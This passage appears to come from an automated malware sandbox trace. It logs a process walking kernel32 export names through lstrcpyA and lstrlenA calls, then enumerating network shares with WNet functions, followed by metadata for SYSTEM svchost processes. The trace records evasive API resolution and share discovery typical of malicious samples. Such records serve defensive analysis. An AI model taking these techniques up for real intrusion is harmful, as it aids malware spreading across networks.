lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0179.270] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0179.270] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0179.270] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0179.270] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0179.270] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0179.270] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0179.270] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0179.270] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0179.270] lstrlenA (lpString="CREATEFILEW") returned 11 [0179.270] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0179.270] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0179.270] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0179.270] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0179.270] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0179.270] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0179.270] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0179.270] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0179.270] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0179.270] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0179.270] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0179.271] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0179.271] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0179.271] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0179.271] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0179.271] lstrlenA (lpString="CREATEJOBSET") returned 12 [0179.271] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0179.271] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0179.271] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0179.271] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0179.271] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0179.271] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0179.271] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0179.271] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0179.271] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0179.271] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0179.271] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0179.271] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0179.271] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0179.271] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0179.271] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0179.271] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0179.271] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0179.271] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0179.271] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0179.271] lstrlenA (lpString="CREATEPIPE") returned 10 [0179.271] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0179.271] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0179.271] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0179.271] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0179.271] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0179.271] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0179.271] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0179.271] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0179.271] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0179.271] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0179.271] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0179.271] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0179.271] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0179.272] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0179.272] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0179.272] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0179.272] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0179.272] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0179.272] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0179.272] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0179.272] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0179.272] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0179.272] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0179.272] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0179.272] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0179.272] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0179.272] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0179.272] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0179.272] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0179.272] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0179.272] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0179.272] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0179.272] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0179.272] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0179.272] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0179.272] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0179.272] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0179.272] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0179.272] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0179.272] lstrlenA (lpString="CREATETHREAD") returned 12 [0179.272] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0179.272] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0179.272] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0179.272] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0179.272] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0179.272] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0179.272] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0179.272] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0179.272] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0179.272] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0179.273] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0179.273] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0179.273] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0179.273] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0179.273] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0179.273] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0179.273] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0179.273] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0179.273] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0179.273] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0179.273] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0179.273] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0179.273] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0179.273] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0179.273] lstrcpyA (in: lpString1=0x392eef0, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0179.273] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0179.273] lstrcpyA (in: lpString1=0x392eef0, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0179.273] lstrlenA (lpString="CTRLROUTINE") returned 11 [0179.273] lstrcpyA (in: lpString1=0x392eef0, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0179.273] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0179.273] lstrcpyA (in: lpString1=0x392eef0, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0179.273] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0179.273] lstrcpyA (in: lpString1=0x392eef0, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0179.273] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0179.273] lstrcpyA (in: lpString1=0x392eef0, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0179.273] lstrlenA (lpString="DEBUGBREAK") returned 10 [0179.273] lstrcpyA (in: lpString1=0x392eef0, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0179.273] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0179.273] lstrcpyA (in: lpString1=0x392eef0, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0179.273] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0179.273] lstrcpyA (in: lpString1=0x392eef0, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0179.273] lstrlenA (lpString="DECODEPOINTER") returned 13 [0179.273] lstrcpyA (in: lpString1=0x392eef0, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0179.273] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0179.273] lstrcpyA (in: lpString1=0x392eef0, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0179.273] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0179.273] lstrcpyA (in: lpString1=0x392eef0, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0179.274] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0179.274] lstrcpyA (in: lpString1=0x392eef0, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0179.274] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0179.274] lstrcpyA (in: lpString1=0x392eef0, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0179.274] lstrlenA (lpString="DELETEATOM") returned 10 [0179.274] lstrcpyA (in: lpString1=0x392eef0, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0179.274] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0179.274] lstrcpyA (in: lpString1=0x392eef0, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0179.274] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0179.274] lstrcpyA (in: lpString1=0x392eef0, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0179.274] lstrlenA (lpString="DELETEFIBER") returned 11 [0179.274] lstrcpyA (in: lpString1=0x392eef0, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0179.274] lstrlenA (lpString="DELETEFILEA") returned 11 [0179.274] lstrcpyA (in: lpString1=0x392eef0, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0179.274] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0179.274] lstrcpyA (in: lpString1=0x392eef0, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0179.274] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0179.274] lstrcpyA (in: lpString1=0x392eef0, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0179.274] lstrlenA (lpString="DELETEFILEW") returned 11 [0179.274] lstrcpyA (in: lpString1=0x392eef0, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0179.274] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0179.274] lstrcpyA (in: lpString1=0x392eef0, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0179.274] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0179.274] lstrcpyA (in: lpString1=0x392eef0, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0179.274] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0179.274] lstrcpyA (in: lpString1=0x392eef0, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0179.274] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0179.274] lstrcpyA (in: lpString1=0x392eef0, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0179.274] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0179.274] lstrcpyA (in: lpString1=0x392eef0, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0179.274] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0179.274] lstrcpyA (in: lpString1=0x392eef0, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0179.274] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0179.274] lstrcpyA (in: lpString1=0x392eef0, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0179.274] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0179.274] lstrcpyA (in: lpString1=0x392eef0, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0179.274] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0179.275] lstrcpyA (in: lpString1=0x392eef0, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0179.275] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0179.275] lstrcpyA (in: lpString1=0x392eef0, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0179.275] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0179.275] lstrcpyA (in: lpString1=0x392eef0, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0179.275] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0179.275] lstrcpyA (in: lpString1=0x392eef0, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0179.275] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0179.275] lstrcpyA (in: lpString1=0x392eef0, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0179.275] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0179.275] lstrcpyA (in: lpString1=0x392eef0, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0179.275] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0179.275] lstrcpyA (in: lpString1=0x392eef0, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0179.275] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0179.275] lstrcpyA (in: lpString1=0x392eef0, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0179.275] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0179.275] lstrcpyA (in: lpString1=0x392eef0, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0179.275] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0179.275] lstrcpyA (in: lpString1=0x392eef0, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0179.275] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0179.275] lstrcpyA (in: lpString1=0x392eef0, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0179.275] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0179.275] lstrcpyA (in: lpString1=0x392eef0, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0179.275] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0179.275] lstrcpyA (in: lpString1=0x392eef0, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0179.275] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0179.275] lstrcpyA (in: lpString1=0x392eef0, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0179.275] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0179.275] lstrcpyA (in: lpString1=0x392eef0, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0179.275] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0179.275] lstrcpyA (in: lpString1=0x392eef0, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0179.275] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0179.275] lstrcpyA (in: lpString1=0x392eef0, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0179.275] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0179.275] lstrcpyA (in: lpString1=0x392eef0, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0179.275] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0179.275] lstrcpyA (in: lpString1=0x392eef0, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0179.275] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0179.276] lstrcpyA (in: lpString1=0x392eef0, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0179.276] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0179.276] lstrcpyA (in: lpString1=0x392eef0, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0179.276] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0179.276] lstrcpyA (in: lpString1=0x392eef0, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0179.276] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0179.276] lstrcpyA (in: lpString1=0x392eef0, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0179.276] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0179.276] lstrcpyA (in: lpString1=0x392eef0, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0179.276] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0179.276] lstrcpyA (in: lpString1=0x392eef0, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0179.276] WNetCloseEnum (hEnum=0x4971f8) returned 0x0 [0179.276] WNetEnumResourceW (in: hEnum=0x4797b8, lpcCount=0x392fbb4, lpBuffer=0x650000, lpBufferSize=0x392fbac | out: lpcCount=0x392fbb4, lpBuffer=0x650000, lpBufferSize=0x392fbac) returned 0x0 [0179.276] WNetOpenEnumW (dwScope=0x2, dwType=0x1, dwUsage=0x13, lpNetResource=0x650000, lphEnum=0x392fb80) Process: id = "13" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x57f23000" os_pid = "0x34c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "12" os_parent_pid = "0x524" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000c8ed" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 260 os_tid = 0x730 Thread: id = 261 os_tid = 0x724 Thread: id = 262 os_tid = 0x720 Thread: id = 263 os_tid = 0x718 Thread: id = 264 os_tid = 0x714 Thread: id = 265 os_tid = 0x70c Thread: id = 266 os_tid = 0x700 Thread: id = 267 os_tid = 0x6e0 Thread: id = 268 os_tid = 0x108 Thread: id = 269 os_tid = 0x110 Thread: id = 270 os_tid = 0x464 Thread: id = 271 os_tid = 0x440 Thread: id = 272 os_tid = 0x420 Thread: id = 273 os_tid = 0x1f8 Thread: id = 274 os_tid = 0xec Thread: id = 275 os_tid = 0x164 Thread: id = 276 os_tid = 0xf8 Thread: id = 277 os_tid = 0x1f4 Thread: id = 278 os_tid = 0x1fc Thread: id = 279 os_tid = 0x3d8 Thread: id = 280 os_tid = 0x3d0 Thread: id = 281 os_tid = 0x3c4 Thread: id = 282 os_tid = 0x378 Thread: id = 283 os_tid = 0x374 Thread: id = 284 os_tid = 0x370 Thread: id = 285 os_tid = 0x36c Thread: id = 286 os_tid = 0x358 Thread: id = 287 os_tid = 0x350 Thread: id = 288 os_tid = 0x738 Thread: id = 290 os_tid = 0x740 Thread: id = 292 os_tid = 0x748 Thread: id = 293 os_tid = 0x74c Thread: id = 294 os_tid = 0x750 Thread: id = 295 os_tid = 0x754 Thread: id = 296 os_tid = 0x758 Thread: id = 297 os_tid = 0x760 Thread: id = 298 os_tid = 0x764 Thread: id = 299 os_tid = 0x768 Thread: id = 300 os_tid = 0x770 Thread: id = 301 os_tid = 0x774 Thread: id = 302 os_tid = 0x778 Thread: id = 321 os_tid = 0x7d4 Thread: id = 324 os_tid = 0x7ec Thread: id = 325 os_tid = 0x438 Thread: id = 327 os_tid = 0x43c Thread: id = 328 os_tid = 0x4ec Thread: id = 329 os_tid = 0x508 Process: id = "14" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x6d4cc000" os_pid = "0x230" os_integrity_level = "0x4000" os_privileges = "0x60b00080" monitor_reason = "rpc_server" parent_id = "13" os_parent_pid = "0x34c" cmd_line = "C:\\Windows\\system32\\svchost.exe -k DcomLaunch" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\DcomLaunch" [0xa], "NT 